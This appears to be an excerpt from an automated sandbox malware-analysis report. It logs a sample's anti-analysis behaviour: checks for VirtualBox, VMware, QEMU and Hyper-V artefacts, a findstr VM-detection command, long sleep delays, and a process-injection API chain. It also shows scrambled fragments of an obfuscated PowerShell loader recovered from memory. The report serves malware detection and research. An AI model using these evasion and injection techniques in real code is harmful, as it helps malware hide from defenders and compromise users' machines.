Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,40_2_0000000140001868
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model FROM Win32_DiskDrive
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer, Model FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxGuest
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: vmci
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: HGFS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: \pipe\VBoxTrayIPC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: VBoxMiniRdrDN
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFB4B1036CD rdtsc 38_2_00007FFB4B1036CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4466Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5416Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3295
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2690
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5673
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3213
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 778
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3663
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2339
Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 416
Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 366
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 375
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 361
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 357
Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 351
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_40-15438
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_37-246
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_40-18313
Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_40-15444
Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_40-15533
Source: C:\Windows\System32\conhost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\winlogon.exeAPI coverage: 9.0 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.1 %
Source: C:\Windows\System32\svchost.exeAPI coverage: 8.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep count: 4466 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep count: 5416 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep count: 3295 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5496Thread sleep count: 2690 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1564Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6168Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6408Thread sleep count: 3663 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep count: 2339 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\dllhost.exe TID: 7208Thread sleep count: 282 > 30
Source: C:\Windows\System32\dllhost.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\winlogon.exe TID: 1196Thread sleep count: 416 > 30
Source: C:\Windows\System32\winlogon.exe TID: 1196Thread sleep time: -41600s >= -30000s
Source: C:\Windows\System32\lsass.exe TID: 5460Thread sleep count: 366 > 30
Source: C:\Windows\System32\lsass.exe TID: 5460Thread sleep time: -36600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5904Thread sleep count: 375 > 30
Source: C:\Windows\System32\svchost.exe TID: 5904Thread sleep time: -37500s >= -30000s
Source: C:\Windows\System32\dwm.exe TID: 5200Thread sleep count: 182 > 30
Source: C:\Windows\System32\svchost.exe TID: 2832Thread sleep count: 361 > 30
Source: C:\Windows\System32\svchost.exe TID: 2832Thread sleep time: -36100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4444Thread sleep count: 357 > 30
Source: C:\Windows\System32\svchost.exe TID: 4444Thread sleep time: -35700s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 8104Thread sleep count: 351 > 30
Source: C:\Windows\System32\svchost.exe TID: 8104Thread sleep time: -35100s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4840Thread sleep count: 348 > 30
Source: C:\Windows\System32\svchost.exe TID: 4840Thread sleep time: -34800s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2328Thread sleep count: 288 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096Thread sleep count: 323 > 30
Source: C:\Windows\System32\svchost.exe TID: 8096Thread sleep time: -32300s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1992Thread sleep count: 314 > 30
Source: C:\Windows\System32\svchost.exe TID: 1992Thread sleep time: -31400s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 5648Thread sleep count: 290 > 30
Source: C:\Windows\System32\svchost.exe TID: 6064Thread sleep count: 306 > 30
Source: C:\Windows\System32\svchost.exe TID: 6064Thread sleep time: -30600s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 1564Thread sleep count: 295 > 30
Source: C:\Windows\System32\svchost.exe TID: 3228Thread sleep count: 295 > 30
Source: C:\Windows\System32\svchost.exe TID: 7252Thread sleep count: 288 > 30
Source: C:\Windows\System32\svchost.exe TID: 916Thread sleep count: 284 > 30
Source: C:\Windows\System32\svchost.exe TID: 2292Thread sleep count: 282 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\cmd.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\winlogon.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B44490D894 FindFirstFileExW,20_2_000001B44490D894
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000001B44490DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000001B44490DA18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_000001C0401CDA18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401CD894 FindFirstFileExW,40_2_000001C0401CD894
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401FDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_000001C0401FDA18
Source: C:\Windows\System32\dllhost.exeCode function: 40_2_000001C0401FD894 FindFirstFileExW,40_2_000001C0401FD894
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99175D894 FindFirstFileExW,41_2_000002E99175D894
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99175DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002E99175DA18
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99178D894 FindFirstFileExW,41_2_000002E99178D894
Source: C:\Windows\System32\winlogon.exeCode function: 41_2_000002E99178DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002E99178DA18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709DD894 FindFirstFileExW,43_2_00000158709DD894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_00000158709DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,43_2_00000158709DDA18
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F066D894 FindFirstFileExW,45_2_000002A3F066D894
Source: C:\Windows\System32\svchost.exeCode function: 45_2_000002A3F066DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_000002A3F066DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
Source: cmd.exe, 00000013.00000003.1690937685.000001EBD5365000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1699733753.000001EBD5366000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1699263741.000001EBD5366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxservice
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D57F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QEMU HARDDISK
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxmouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: C:\Program Files\VMware
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxMouse.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys@
Source: cmd.exe, 00000013.00000003.1690901511.000001EBD53BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1691126167.000001EBD53B8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000003.1698911244.000001EBD53BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Winsta0\Default=::=::\=C:=C:\Users\user\DesktopadkCiysMmhjqykstcChuhrDPRCQvx=esblcks);'.RahNPlsXJhyfvTcQkBWktebzF= (PNNxp (blcALBQNoklYmnvMqIjuKZloxTIro=ktblckrblckeALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingArJZdvjpUptzBxvHvVzmRfwURGQDImiUiFepc=lckablckmblcarQbzXMlQaKmxQdurvXHJDiXfLrQbGJVpZM=t=[string[]]ARTcJFSmRhgHuSEVippzfFGXELhPNfdKWcEyxbe=;Invoke-ExpAryrEiMSvbpMzJYfBAYJTgXlvxSSZldHrVFEo= PNNxp($qgBgAyUllFfCWzKmBQZVLaccuQXnireOSWwpcmWKBmy=tblckrblckebbEqHxaAldzMVZchChAPefbpSXeULFu=.Replace('blBirtiNrHVYDUNOfnuwezvYlMeMCKv=stem.SecuritBjgLdjxLERRreRJOdBgCGHmjbhPayNZRJLtkQ=kSblckyblcksBjNaUJYFtDDvZOpjtVkkwMoujNYFxlirOvdn=rity.CryptogBjODtptiZVMnhNLphWGYLOGXSfg=blckoblckrblBlMwEAfmtMEkQJBhANdInPMKsfWGdzs=ckrblckyblckBwMSuWUxrcTzMwozeerirEuWggRE=.blckMblckebbWqwEcnSQuVPbgzZIJhpj='blck', '');BWTJwdXgkYrcJpKhsjetHrudPEdUWIhjstyHx=$BZwPR=[SystBwVSeyAtSDInBjVCzGYmiwZJzkKTSwkHCUgRSOz=$host.UI.RawbxsqEpkJRPGjAbsGsFwnyOiXVgw=blckBblckablcCOSJSjaMRRokVhPLqsQzLlRqUPu=Expression 'CCVdyswDTorbNVRsRbdOSu=.MblckeblckmCdIvahXCUGViOpDUSnzHcN=gJbXPg
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmmouse.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D580A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemuwmi2B
Source: lsass.exe, 0000002A.00000000.2197017200.00000213BCE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002A.00000002.2697105263.00000213BCE13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D580A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu-ga
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmusrvc2B
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: c:\program files\vmware@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D59BB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicshutdown
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Time Synchronization Service
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxsf.sys@
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmicvss
Source: lsass.exe, 0000002A.00000002.2702699224.00000213BCE89000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxGuest.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VBoxSF.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5B87000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxguest.sys
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000008.00000002.1695772455.00000201D5A97000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !Hyper-V PowerShell Direct Service
